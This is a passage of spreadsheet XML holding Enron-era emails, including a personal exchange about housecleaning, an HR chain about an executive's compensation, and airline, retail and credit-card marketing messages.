    <t>Thu, 17 Jan 2002 08:16:14 -0800 (PST)</t>
  </si>
  <si>
    <t>gas physical</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
see updated lists_x000D_
_x000D_
thanks_x000D_
_x000D_
bob_x000D_
_x000D_
_x000D_
more to follow.</t>
  </si>
  <si>
    <t>Mon, 28 Feb 2000 23:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Interview for Lee</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 07:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: FW: OnePass eTicket Itinerary and Receipt</t>
  </si>
  <si>
    <t xml:space="preserve">Uhhh - NO.  I did clean the bathroom last nite.  I do that once every couple _x000D_
of months whether it needs it or not._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Germany, Mary/COR" &lt;mgermany@CH2M.com&gt; on 04/06/2001 12:32:46 PM_x000D_
To: "'Chris.Germany@enron.com'" &lt;Chris.Germany@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: FW: OnePass eTicket Itinerary and Receipt_x000D_
_x000D_
_x000D_
What about dusting?  will you do that too?_x000D_
_x000D_
Mary Germany, Manager_x000D_
Accounts Payable_x000D_
Payroll_x000D_
Accounting Support_x000D_
(303) 713-2151_x000D_
fax (303) 846-2151_x000D_
email - mgermany@ch2m.com_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Chris.Germany@enron.com [mailto:Chris.Germany@enron.com]_x000D_
Sent: April 04, 2001 9:40 AM_x000D_
To: Germany, Mary/COR_x000D_
Subject: Re: FW: OnePass eTicket Itinerary and Receipt_x000D_
_x000D_
_x000D_
_x000D_
Cool!!   I'll start cleaning my apartment.  Heck, I may even vacum!!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Apr 2000 11:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tara.rozen@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Steven_x000D_
_x000D_
I will fax you now the revised Executive Agreement with the LTIP wording in _x000D_
it. Also, the retention payments will be made via the EDRIP plan and I have _x000D_
attached this._x000D_
_x000D_
If you have any questions, please let me know._x000D_
_x000D_
Regards_x000D_
Tara_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
_x000D_
_x000D_
	Enron Europe_x000D_
	_x000D_
	From:  Melissa Laing                           14/04/2000 18:44_x000D_
	_x000D_
_x000D_
To: Tara Rozen/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re:  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
David Oxley_x000D_
14/04/2000 18:35_x000D_
To: Shelly Pierce/HOU/ECT@ECT_x000D_
cc: Michelle Cash/HOU/ECT@ECT, Melissa Laing/LON/ECT@ECT _x000D_
_x000D_
Subject: _x000D_
_x000D_
Shelley,_x000D_
_x000D_
Please help with below?_x000D_
_x000D_
David_x000D_
---------------------- Forwarded by David Oxley/HOU/ECT on 04/14/2000 12:34 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Steven J Kean@EES_x000D_
04/14/2000 11:05 AM_x000D_
To: David Oxley/HOU/ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Mark Frevert and I have been talking with Mark Schroeder about an extension _x000D_
to his employment contract.  I believe you may have been involved.  Mark S _x000D_
tells me that the contract did not include the long term comp that we had _x000D_
been discussing.  My copy shows it, but he got his copy from Frevert.  It _x000D_
apparently shows monthly salary on the Exhibit, but not the long term comp.  _x000D_
Frevert is out on vacation, so I am trying to wrap this up with Schroeder.  _x000D_
The contract Frevert sent me showed annual long term comp of 250 split evenly _x000D_
between options and restricted stock.  Could you look into you records and _x000D_
see what you show and if consistent with the above, fax a copy to schroeder _x000D_
(44-207-783-8581).  Thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 22:38:27 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;http://graphics.aa.com/editorials/images1/header_new.jpg&gt;=09_x000D_
Dear Theresa Staab,=20_x000D_
_x000D_
Today's American Airlines Domestic &amp; International Net SAAver Weekend Getaw=_x000D_
ay Fares e-mail offer is valid for travel next weekend.=20_x000D_
Domestic Departure dates: November 2 - 3, 2001.=20_x000D_
International Departure dates: November 1 - 2, 2001.=20_x000D_
Tickets must be purchased by Friday, October 26, 2001.=20_x000D_
=20_x000D_
You can find different Domestic Net SAAver Weekend Getaway destinations for=_x000D_
 this weekend, departing October 26 - 27, 2001. DON'T FORGET, now Net SAAve=_x000D_
rs mean more than just special weekend fares. Remember to check our "Net SA=_x000D_
Aver and Special Offers" page often for details on all of our other special=_x000D_
 fares and offers at:=20_x000D_
=20_x000D_
www.aa.com/netsaaver &lt;http://info.aa.com/Key=3D12575.Ge0p.B.BHuBvG&gt;=20_x000D_
=20_x000D_
You can also find additional savings for travel this weekend using TWA's gr=_x000D_
eat Dot Com Deals(R). See roundtrip examples below:=20_x000D_
=20_x000D_
_x000D_
Fare:=09 Coach Class From:=09 To:=09=20_x000D_
$69=09 St. Louis, MO (STL)=09 Cedar Rapids, IA (CID)=09=20_x000D_
$79=09 St. Louis, MO (STL)=09 Dayton, OH (DAY)=09=20_x000D_
$69=09 St. Louis, MO (STL)=09 Springfield, MO (SGF)=09=20_x000D_
$169=09 St. Louis, MO (STL)=09 Orange County, CA (SNA)=09=20_x000D_
_x000D_
_x000D_
For a complete listing of fares and details on related rules and restrictio=_x000D_
ns, go to www.twa.com/dcdeals &lt;http://info.aa.com/Key=3D12575.Ge0p.C.BWg9CG=_x000D_
&gt;=20_x000D_
IN THIS ISSUE=09=20_x000D_
  &lt;http://graphics.aa.com/editorials/images1/menu9_2.gif&gt;=09  &lt;http://graph=_x000D_
ics.aa.com/editorials/images1/nsa-spacer.gif&gt;_x000D_
American Airlines Travel Information=20_x000D_
Visit AA.com Online Travel Information Center for the latest information to=_x000D_
 assist with your travel planning. You will find current flight schedules, =_x000D_
gates and times information, and the most recent travel policy changes. Jus=_x000D_
t visit:=20_x000D_
=20_x000D_
www.aa.com/travelinfo &lt;http://info.aa.com/Key=3D12575.Ge0p.D.Dtma8B&gt;=20_x000D_
_x000D_
=09_x000D_
  &lt;http://graphics.aa.com/editorials/images1/nsb-1.gif&gt;DOMESTIC WEEKEND GET=_x000D_
AWAY FARES=09=20_x000D_
TRAVEL DATES AND TIMES FOR WEEKEND GETAWAY FARES=20_x000D_
_x000D_
- Depart Friday, November 2, 2001 on or after 7:00 p.m. or anytime on Satur=_x000D_
day,=20_x000D_
  November 3, 2001.=20_x000D_
- Return anytime the following Monday, November 5, 2001 or Tuesday, Novembe=_x000D_
r 6, 2001.=20_x000D_
- Friday evening travel may not be available in all markets.=20_x000D_
- Tickets must be purchased no later than this Friday, October 26, 2001, 12=_x000D_
:00 midnight=20_x000D_
  (CT).=20_x000D_
- Fares shown are roundtrip.=20_x000D_
_x000D_
_x000D_
FROM:=09 TO:=09 PRICE:=09=20_x000D_
  &lt;http://graphics.aa.com/editorials/images1/nsa-line.gif&gt;=09_x000D_
Boston, MA (BOS)=09 San Francisco, CA (SFO)=09 $229=09=20_x000D_
Chicago O'Hare, IL (ORD)=09 Columbus, OH (CMH) #=09 $ 79=09=20_x000D_
Chicago O'Hare, IL (ORD)=09 El Paso, TX (ELP)=09 $149=09=20_x000D_
Chicago O'Hare, IL (ORD)=09 Huntsville, AL (HSV) #=09 $119=09=20_x000D_
 =09=20_x000D_
Chicago O'Hare, IL (ORD)=09 Indianapolis, IN (IND) #=09 $ 69=09=20_x000D_
Chicago O'Hare, IL (ORD)=09 La Crosse, WI (LSE) #=09 $ 69=09=20_x000D_
Chicago O'Hare, IL (ORD)=09 Providence, RI (PVD)=09 $119=09=20_x000D_
Chicago O'Hare, IL (ORD)=09 Rochester, MN (RST)=09 $ 79=09=20_x000D_
 =09=20_x000D_
Chicago O'Hare, IL (ORD)=09 Seattle, WA (SEA)=09 $169=09=20_x000D_
Chicago O'Hare, IL (ORD)=09 Toledo, OH (TOL) #=09 $ 69=09=20_x000D_
Chicago O'Hare, IL (ORD)=09 West Palm Beach, FL (PBI)=09 $149=09=20_x000D_
Columbus, OH (CMH)=09 Chicago O'Hare, IL (ORD) #=09 $ 79=09=20_x000D_
 =09=20_x000D_
Dallas/Ft. Worth, TX (DFW)=09 Greensboro, NC (GSO)=09 $129=09=20_x000D_
Dallas/Ft. Worth, TX (DFW)=09 Long Beach, CA (LGB)=09 $149=09=20_x000D_
Dallas/Ft. Worth, TX (DFW)=09 Louisville, KY (SDF)=09 $119=09=20_x000D_
Dallas/Ft. Worth, TX (DFW)=09 Milwaukee, WI (MKE) #=09 $129=09=20_x000D_
 =09=20_x000D_
Dallas/Ft. Worth, TX (DFW)=09 Richmond, VA (RIC)=09 $149=09=20_x000D_
Dallas/Ft. Worth, TX (DFW)=09 Tucson, AZ (TUS)=09 $119=09=20_x000D_
Dallas/Ft. Worth, TX (DFW)=09 Tulsa, OK (TUL) =09 $ 69=09 ?El Paso, TX (ELP=_x000D_
)=09 Chicago O'Hare, IL (ORD)=09 $149=09 ? =09 ?Greensboro, NC (GSO)=09 Dal=_x000D_
las/Ft. Worth, TX (DFW)=09 $129=09 ?Huntsville, AL (HSV)=09 Chicago O'Hare,=_x000D_
 IL (ORD) #=09 $119=09 ?Indianapolis, IN (IND)=09 Chicago O'Hare, IL (ORD) =_x000D_
#=09 $ 69=09 ?La Crosse, WI (LSE)=09 Chicago O'Hare, IL (ORD) #=09 $ 69=09 =_x000D_
? =09 ?Long Beach, CA (LGB)=09 Dallas/Ft. Worth, TX (DFW)=09 $149=09 ?Los A=_x000D_
ngeles, CA (LAX)=09 San Jose, CA (SJC)=09 $ 79=09 ?Louisville, KY (SDF)=09 =_x000D_
Dallas/Ft. Worth, TX (DFW)=09 $119=09 ?Milwaukee, WI (MKE)=09 Dallas/Ft. Wo=_x000D_
rth, TX (DFW) #=09 $129=09 ? =09 ?New Orleans, LA (MSY)=09 Chicago O'Hare, =_x000D_
IL (ORD)=09 $119=09 ?New York LaGuardia, NY (LGA)=09 Dallas/Ft. Worth, TX (=_x000D_
DFW)=09 $149=09 ?New York LaGuardia, NY (LGA)=09 West Palm Beach, FL (PBI)=_x000D_
=09 $149=09 ?Providence, RI (PVD)=09 Chicago O'Hare, IL (ORD)=09 $119=09 ? =_x000D_
=09 ?Richmond, VA (RIC)=09 Dallas/Ft. Worth, TX (DFW)=09 $149=09 ?Rochester=_x000D_
, MN (RST)=09 Chicago O'Hare, IL (ORD)=09 $ 79=09 ?San Francisco, CA (SFO)=_x000D_
=09 Boston, MA (BOS)=09 $229=09 ?San Jose, CA (SJC)=09 Los Angeles, CA (LAX=_x000D_
)=09 $ 79=09 ? =09 ?Seattle, WA (SEA)=09 Chicago O'Hare, IL (ORD)=09 $169=_x000D_
=09 ?Toledo, OH (TOL)=09 Chicago O'Hare, IL (ORD) #=09 $ 69=09 ?Tucson, AZ =_x000D_
(TUS)=09 Dallas/Ft. Worth, TX (DFW)=09 $119=09 ?Tulsa, OK (TUL)=09 Dallas/F=_x000D_
t. Worth, TX (DFW) =09 $ 69=09=20_x000D_
 =09=20_x000D_
West Palm Beach, FL (PBI)=09 Chicago O'Hare, IL (ORD)=09 $149=09=20_x000D_
West Palm Beach, FL (PBI)=09 New York LaGuardia, NY (LGA)=09 $149=09=20_x000D_
 =09=20_x000D_
# American Eagle service=20_x000D_
 A portion of travel may be on American Eagle service ???HOW TO BOOK NET SA=_x000D_
AVER FARES ?Net SAAver Fares are now available on the Web at AA.com. ?To bo=_x000D_
ok, login to AA.com with your AAdvantage number and PIN by clicking: ?www.a=_x000D_
a.com/netsaaver &lt;http://info.aa.com/Key=3D12575.Ge0p.B.BHuBvG&gt; . ??=09?  &lt;h=_x000D_
ttp://graphics.aa.com/editorials/images1/nsb-2.gif&gt;INTERNATIONAL WEEKEND GE=_x000D_
TAWAY FARES=09 ?TRAVEL DATES AND TIMES FOR WEEKEND GETAWAY FARES ??- Depart=_x000D_
 Thursday, November 1, 2001 or Friday, November 2, 2001. ?- Return anytime =_x000D_
the following Monday, November 5, 2001 or Tuesday, November 6, 2001. ?- Tic=_x000D_
kets must be purchased no later than this Friday, October 26, 2001, 12:00 m=_x000D_
idnight ?  (CT). ?- Fares shown are roundtrip. ???FROM:=09 TO:=09 PRICE:=09=_x000D_
 ?  &lt;http://graphics.aa.com/editorials/images1/nsa-line.gif&gt;=09?Boston, MA =_x000D_
(BOS)=09 London Heathrow, UK (LHR)=09 $229=09 ?Boston, MA (BOS)=09 Paris De=_x000D_
 Gaulle, France (CDG)=09 $249=09 ?Chicago O'Hare, IL (ORD)=09 Brussels, Bel=_x000D_
gium (BRU)=09 $299=09 ?Chicago O'Hare, IL (ORD)=09 Frankfurt, Germany (FRA)=_x000D_
=09 $299=09 ? =09 ?Chicago O'Hare, IL (ORD)=09 London Heathrow, UK (LHR)=09=_x000D_
 $279=09 ?Dallas/Ft. Worth, TX (DFW)=09 Acapulco, Mexico (ACA)=09 $199=09 ?=_x000D_
Dallas/Ft. Worth, TX (DFW)=09 Belize City, Belize (BZE)=09 $285=09 ?Dallas/=_x000D_
Ft. Worth, TX (DFW)=09 Caracas, Venezuela (CCS)=09 $379=09 ? =09 ?Dallas/Ft=_x000D_
. Worth, TX (DFW)=09 Leon, Mexico (BJX)=09 $229=09 ?Dallas/Ft. Worth, TX (D=_x000D_
FW)=09 Paris De Gaulle, France (CDG)=09 $329=09 ?Dallas/Ft. Worth, TX (DFW)=_x000D_
=09 Santiago, Chile (SCL)=09 $549=09 ?Dallas/Ft. Worth, TX (DFW)=09 Sao Pau=_x000D_
lo, Brazil (GRU)=09 $449=09 ? =09 ?Dallas/Ft. Worth, TX (DFW)=09 Zurich, Sw=_x000D_
itzerland (ZRH)=09 $319=09 ?Fort Lauderdale, FL (FLL)=09 Nassau, Bahamas (N=_x000D_
AS) #=09 $ 79=09 ?Los Angeles, CA (LAX)=09 London Heathrow, UK (LHR)=09 $34=_x000D_
9=09 ?Miami, FL (MIA)=09 Antigua, Antigua (ANU)=09 $219=09 ? =09 ?Miami, FL=_x000D_
 (MIA)=09 Barranquilla, Colombia (BAQ)=09 $299=09 ?Miami, FL (MIA)=09 Bogot=_x000D_
a, Colombia (BOG)=09 $299=09 ?Miami, FL (MIA)=09 Buenos Aires, Argentina (E=_x000D_
ZE)=09 $489=09 ?Miami, FL (MIA)=09 Cali, Colombia (CLO)=09 $299=09 ? =09 ?M=_x000D_
iami, FL (MIA)=09 Caracas, Venezuela (CCS)=09 $229=09 ?Miami, FL (MIA)=09 M=_x000D_
exico City, Mexico (MEX)=09 $209=09 ?Miami, FL (MIA)=09 Puerto Plata, Domin=_x000D_
ican Republic (POP)=09 $179=09 ?Miami, FL (MIA))=09 San Salvador, El Salvad=_x000D_
or (SAL)=09 $319=09 ? =09 ?Miami, FL (MIA)=09 St. Croix, USVI (STX)=09 $249=_x000D_
=09 ?Miami, FL (MIA)=09 Tegucigalpa, Honduras (TGU)=09 $309=09 ?New York Ke=_x000D_
nnedy, NY (JFK)=09 Buenos Aires, Argentina (EZE)=09 $539=09 ?New York Kenne=_x000D_
dy, NY (JFK)=09 Kingston, Jamaica (KIN)=09 $259=09 ? =09 ?New York Kennedy,=_x000D_
 NY (JFK)=09 London Heathrow, UK (LHR)=09 $229=09 ?New York Kennedy, NY (JF=_x000D_
K)=09 Montego Bay, Jamaica (MBJ)=09 $249=09 ?New York Kennedy, NY (JFK)=09 =_x000D_
Port Au Prince, Haiti (PAP)=09 $229=09 ?New York Kennedy, NY (JFK)=09 San J=_x000D_
uan, PR (SJU)=09 $249=09 ? =09 ?New York Kennedy, NY (JFK)=09 Sao Paulo, Br=_x000D_
azil (GRU)=09 $539=09 ?Newark, NJ (EWR)=09 London Heathrow, UK (LHR)=09 $22=_x000D_
9=09 ?Orlando, FL (MCO)=09 San Juan, PR (SJU)=09 $199=09 ?Raleigh/Durham, N=_x000D_
C (RDU)=09 London Gatwick, UK (LGW)=09 $289=09 ? =09 ?San Jose, CA (SJC)=09=_x000D_
 Tokyo Narita, Japan (NRT)=09 $399=09 ?San Juan, PR (SJU)=09 Newark, NJ (EW=_x000D_
R)=09 $249=09 ?San Juan, PR (SJU)=09 Orlando, FL (MCO)=09 $199=09 ?San Juan=_x000D_
, PR (SJU)=09 Tampa, FL (TPA)=09 $199=09 ? =09 ?Seattle, WA (SEA)=09 Tokyo =_x000D_
Narita, Japan (NRT)=09 $399=09 ?Tampa, FL (TPA)=09 San Juan, PR (SJU)=09 $1=_x000D_
99=09 ? =09 ?# American Eagle service ??HOW TO BOOK NET SAAVER FARES ?Net S=_x000D_
AAver Fares are now available on the Web at AA.com. ?To book, login to AA.c=_x000D_
om with your AAdvantage number and PIN by clicking: ?www.aa.com/netsaaver &lt;=_x000D_
http://info.aa.com/Key=3D12575.Ge0p.B.BHuBvG&gt; . ??=09?  &lt;http://graphics.aa=_x000D_
.com/editorials/images1/nsb-3.gif&gt;AADVANTAGE NET SAAVER AWARDS=09 ?Travel O=_x000D_
n 4,000 AAdvantage Miles! ??Award travel is closer than you think because n=_x000D_
ow you can claim AAdvantage Net SAAver Awards for as low as 4,000 AAdvantag=_x000D_
e miles. With this award reduction, getting away with Net SAAver Awards has=_x000D_
 never been easier! ? ?See how far your miles can take you. Call AAdvantage=_x000D_
 today. ? ??  $69 destinations are just $39 plus   4,000 miles ?  $79 desti=_x000D_
nations are just $39 plus   7,000 miles ?$119 destinations are just $39 plu=_x000D_
s 13,000 miles ?$129 destinations are just $39 plus 13,000 miles ?$149 dest=_x000D_
inations are just $39 plus 13,000 miles ??Our AAdvantage Net SAAver Awards =_x000D_
are a great way to use your AAdvantage miles to obtain a travel award for l=_x000D_
ess mileage. To determine the mileage required, compare the fares in this w=_x000D_
eek's Domestic Weekend Getaway list with the chart above. ?AAdvantage Net S=_x000D_
AAver Awards are valid for travel departing November 2 - 3, 2001 for the ma=_x000D_
rkets listed above. ?AAdvantage Net SAAver Awards are not applicable to Fir=_x000D_
st/Business Class, International or Transborder fares. ?To book your AAdvan=_x000D_
tage Net SAAver Award trip call AAdvantage toll-free, 800-882-8880. ??  =09=_x000D_
?  &lt;http://graphics.aa.com/editorials/images1/nsb-4.gif&gt;OTHER VACATION PACK=_x000D_
AGES=09 ?AA Vacations ???American Airlines Vacation Packages??SAVE Up To 50=_x000D_
% In the Caribbean With American Airlines Vacations ? ?4 days/3 nights from=_x000D_
 $151* per person, land only, double occupancy at Condado Plaza Hotel &amp; Cas=_x000D_
ino, Puerto Rico. ? ?Now's a great time to visit the Caribbean and relax in=_x000D_
 the warm Caribbean sun. Choose from a wide variety of Islands and hotels o=_x000D_
ffering greatly reduced rates! HURRY! These offers are based on availabilit=_x000D_
y. *For complete details, click below: ? ?aavacations.com/specials/caribbea=_x000D_
n_offers.asp &lt;http://info.aa.com/Key=3D12575.Ge0p.E.DAJzCD&gt; ? ?? =09 ?Westi=_x000D_
n, Sheraton, Four Points by Sheraton, St. Regis, The Luxury Collection and =_x000D_
W Hotels. ??From sea to shining sea, with over 300 unique destinations, we'=_x000D_
ve got you covered. See America with Starwood Hotels &amp; Resorts. Stay at Wes=_x000D_
tin, Sheraton, Four Points by Sheraton, St. Regis, The Luxury Collection an=_x000D_
d W Hotels and take advantage of $49 to $179 weekend rates (Thurs-Sun) and =_x000D_
savings of up to 40% on weekday rates (Mon-Wed) from now until January 27, =_x000D_
2002. To take advantage of these and other special rates call 1-877-782-011=_x000D_
4 and mention promotion code GOUSAADV or book at: ? ?www.starwood.com/saaa1=_x000D_
 &lt;http://info.aa.com/Key=3D12575.Ge0p.F.BEy3HL&gt; =09? =09 ? =09 ?Hertz(R) ? =_x000D_
??Last Minute Specials! It's your country. See it.??Save on last-minute tra=_x000D_
vel at your favorite airport destinations in the U.S. and Canada. Here are =_x000D_
just a few of the many Last Minute Specials - book by noon 10/29 (ET) and p=_x000D_
ick up before 11/12/01: ?Chicago, IL (ORD)=09 Compact=09 $16.99 Wknd Day=09=_x000D_
 ?Dallas, TX (DFW)=09 Compact=09 $14.99 Wknd Day=09 ?Los Angeles, CA (LAX)=_x000D_
=09 Compact=09 $15.99 Wknd Day=09 ?Philadelphia, PA (PHL)=09 Compact=09 $16=_x000D_
.99 Wknd Day=09 ?? ?For additional cities and complete details, click below=_x000D_
: ??www2.hertz.com/spec/link.cfm?cp_code=3DEM08&amp;cdp_code=3D217692&amp;goto_url=_x000D_
=3D/spec/lastminute00/index.html &lt;http://info.aa.com/Key=3D12575.Ge0p.G.B07=_x000D_
jDB&gt; ? =09 ?Marriott Rewards? ??Buy Three, Stay Free This Fall! ?Marriott R=_x000D_
ewards members earn a free weekend night for every three weekend nights the=_x000D_
y stay with Marriott this fall. Just stay three weekend nights between now =_x000D_
and December 23, 2001, and you'll earn a free weekend-night certificate val=_x000D_
id for a future stay at over 1,900 properties - up to three free weekend ni=_x000D_
ghts! Also, as a Marriott Rewards member, you'll earn up to three AAdvantag=_x000D_
e miles per US$1 spent at nine Marriott brands. To register and for complet=_x000D_
e terms &amp; conditions, click: ? ?member.marriottrewards.com/secure/Prmo.asp?=_x000D_
PSrc=3DPTAA &lt;http://info.aa.com/Key=3D12575.Ge0p.H.EDOWis&gt; =09?  &lt;http://gr=_x000D_
aphics.aa.com/editorials/images1/nsb-5.gif&gt;ADDITIONAL RULES AND RESTRICTION=_x000D_
S=09 ?AA WEEKEND GETAWAY FARES RESTRICTIONS: ?Fares shown do not include (i=_x000D_
) up to a $2.75 USD federal excise tax, which will be imposed on each fligh=_x000D_
t segment of your itinerary, (ii) local airport charges of up to $18, if ap=_x000D_
plicable, and, (iii) Canadian taxes of up to $22, if applicable. Internatio=_x000D_
nal fares are subject to government approval. Government taxes and fees of =_x000D_
up to $108 USD, varying by destination, are not included and may vary sligh=_x000D_
tly depending on currency exchange rates at the time of purchase. Tickets a=_x000D_
re nonrefundable and must be purchased at the time the reservation is made.=_x000D_
 Prior to departure, changes to your ticket may be made if you pay up to a =_x000D_
$100 USD change fee and meet the restrictions applicable to the new fare. S=_x000D_
eats are limited. Fares may not be available on all flights and are subject=_x000D_
 to change without notice. All or a portion of your travel may be on Americ=_x000D_
an Eagle, American's regional airline associate. Other restrictions apply, =_x000D_
click on one of the links below, or go to http://www.aa.com/netsaaver for m=_x000D_
ore information. www.aa.com/netsaaver &lt;http://info.aa.com/Key=3D12575.Ge0p.=_x000D_
B.BHuBvG&gt; for more information. ? ?www.aa.com/domnsrules &lt;http://info.aa.co=_x000D_
m/Key=3D12575.Ge0p.I.DHTryM&gt; ?www.aa.com/intlnsrules &lt;http://info.aa.com/Ke=_x000D_
y=3D12575.Ge0p.J.wOgO4&gt; ? ?Net SAAver Fares is a trademark and American Air=_x000D_
lines and American Eagle are registered trademarks of American Airlines, In=_x000D_
c.=09 ? =09 ?  &lt;http://graphics.aa.com/editorials/images1/nsb-6.gif&gt;SUBSCRI=_x000D_
BE/UNSUBSCRIBE INSTRUCTIONS =09?This email has been sent to TSTAAB@ENRON.CO=_x000D_
M ??If you choose not to receive Net SAAver Weekend Getaway Fares messages,=_x000D_
 or if you would like to change your e-mail address, please visit:??www.aa.=_x000D_
com/unsubscribe &lt;http://info.aa.com/data/95P15R4/Key=3D12575.Ge0p.K.COdSPx&gt;=_x000D_
 ??This is a post only e-mail. Please do not reply to this message. For all=_x000D_
 inquires, go to www.aa.com/contactaa or send an email to webmaster@im.aa.c=_x000D_
om ?=09??Message-Id: &lt;20011023003827.E59E.1585391-12575@info.aa.com&gt;?  &lt;htt=_x000D_
p://info.aa.com/images/blankpixel.gif/Key=3D12575.Ge0p.x6YOP&gt;</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 15:45:27 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sharperimageoffers@sharperimage.m0.net'})</t>
  </si>
  <si>
    <t>25% Off 10 Great Items!</t>
  </si>
  <si>
    <t>25% Off 10 Great Items - 5 Days Only!_x000D_
_x000D_
Dear Richard, _x000D_
_x000D_
To view this offer online, click here &lt;http://sharper.m0.net/m/s.asp?HB4863988224X1156160X85315X&gt;._x000D_
_x000D_
For 5 days only, enjoy 25% savings on 10 of our most popular _x000D_
products! For example, our award-winning Vertical 3-CD Stereo is _x000D_
just $202.46 - you save over $40! And our best-selling Razor _x000D_
Xtreme can be yours for only $52.46 - a full $37.49 less than its _x000D_
original price of $89.95 _x000D_
_x000D_
Vertical 3-CD Stereo &lt;http://sharper.m0.net/m/s.asp?HB4863988224X1156161X85315X&gt;_x000D_
Ionic Conditioning Hair Dryer Set &lt;http://sharper.m0.net/m/s.asp?HB4863988224X1156163X85315X&gt;_x000D_
Steam Wizard Turbo Steamer &amp; Wet/Dry Vacuum &lt;http://sharper.m0.net/m/s.asp?HB4863988224X1156165X85315X&gt;_x000D_
CD Radio/Alarm Clock with Sound Soother &lt;http://sharper.m0.net/m/s.asp?HB4863988224X1156167X85315X&gt;_x000D_
Cuisinart CoffeeBar Automatic Grind &amp; Brew &lt;http://sharper.m0.net/m/s.asp?HB4863988224X1156169X85315X&gt;_x000D_
106-Piece Tool Set &lt;http://sharper.m0.net/m/s.asp?HB4863988224X1156171X85315X&gt;_x000D_
Motorized 200 CD Rack with Light &lt;http://sharper.m0.net/m/s.asp?HB4863988224X1156173X85315X&gt;_x000D_
Razor Xtreme Scooter &lt;http://sharper.m0.net/m/s.asp?HB4863988224X1156175X85315X&gt;_x000D_
Mini Step and Flex &lt;http://sharper.m0.net/m/s.asp?HB4863988224X1156177X85315X&gt;_x000D_
8x22 Binocular with Compass &lt;http://sharper.m0.net/m/s.asp?HB4863988224X1156179X85315X&gt;_x000D_
_x000D_
There's no limit to your purchases, but don't delay - some items _x000D_
have limited quantities. This offer is good online, in stores and _x000D_
by phone. _x000D_
_x000D_
Don't miss this chance to save on your holiday shopping! _x000D_
Click here to start shopping &lt;http://sharper.m0.net/m/s.asp?HB4863988224X1156227X85315X&gt;._x000D_
_x000D_
Richard Thalheimer _x000D_
Founder _x000D_
The Sharper Image _x000D_
_x000D_
_x000D_
About this offer:_x000D_
This offer is for a 25% savings off the 10 Sharper Image products _x000D_
shown above. Offer is good through November 29, 2001. Redeem _x000D_
online by clicking through this email to our primary U.S. Web _x000D_
site, www.sharperimage.com. You may also redeem by telephone _x000D_
(800) 344-4444 (mention code 16555) or in any of our more than _x000D_
100 stores when you bring in a printout of this email (POS _x000D_
16555). If any item is not on-hand, a store associate will be _x000D_
happy to place an order for you (delivery charges will apply). _x000D_
_x000D_
_x000D_
We hope you enjoy receiving Sharper Image's email special offers _x000D_
and product previews. However, if you wish to unsubscribe from _x000D_
this email list, please click here &lt;http://sharper.m0.net/m/u/s.asp?e=rick.buy%40enron.com&gt;. _x000D_
&lt;http://sharper.m0.net/m/u/s.asp?e=rick.buy%40enron.com&gt;_x000D_
_x000D_
Please allow 2-3 weeks for us to remove your email address. You _x000D_
may receive further emails from us during that time, for which we _x000D_
apologize. Thank you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 &lt;http://www.m0.net/m/logopen02.asp?vid=4&amp;catid=4863988224&amp;ecid=0&gt;</t>
  </si>
  <si>
    <t>Thu, 17 Jan 2002 06:54:39 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'service@capitalone.bfi0.com'})</t>
  </si>
  <si>
    <t>Account Update from Capital One</t>
  </si>
  <si>
    <t xml:space="preserve"> Capital One_x000D_
 - what's in your wallet? &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/masthead.jpg&gt;_x000D_
 Online Account Services &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/oas.gif&gt;_x000D_
_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	_x000D_
_x000D_
As a valued customer of Capital One's Online Account Services, each month you will automatically receive an e-mail notification letting you know that your current statement is available online._x000D_
_x000D_
To view your current Capital One statement, just visit www.capitalone.com &lt;http://capitalone.bfi0.com/Y0RH0615A5E03EDF1974&gt;, log in and then click the "My Statement" link at the top of the screen. It's that easy._x000D_
_x000D_
_x000D_
Thank you for using Capital One's Online Account Services._x000D_
_x000D_
Click here to login and view your online statement &lt;http://capitalone.bfi0.com/Y0RH0615A5E33EDF1974&gt;_x000D_
_x000D_
Get more from Capital One_x000D_
_x000D_
As one of our valued customers, we also provide you with a variety of special partner offers for valuable financial products and services._x000D_
_x000D_
_x000D_
_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
	  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
Ready to buy a new home? Apply for a home loan online._x000D_
_x000D_
Visit our Home Center now &lt;http://capitalone.bfi0.com/Y0RH0615A5E53EDF1974&gt;._x000D_
 Loan Center powered by E-Loan &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/eloan.gif&gt;_x000D_
_x000D_
	  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	_x000D_
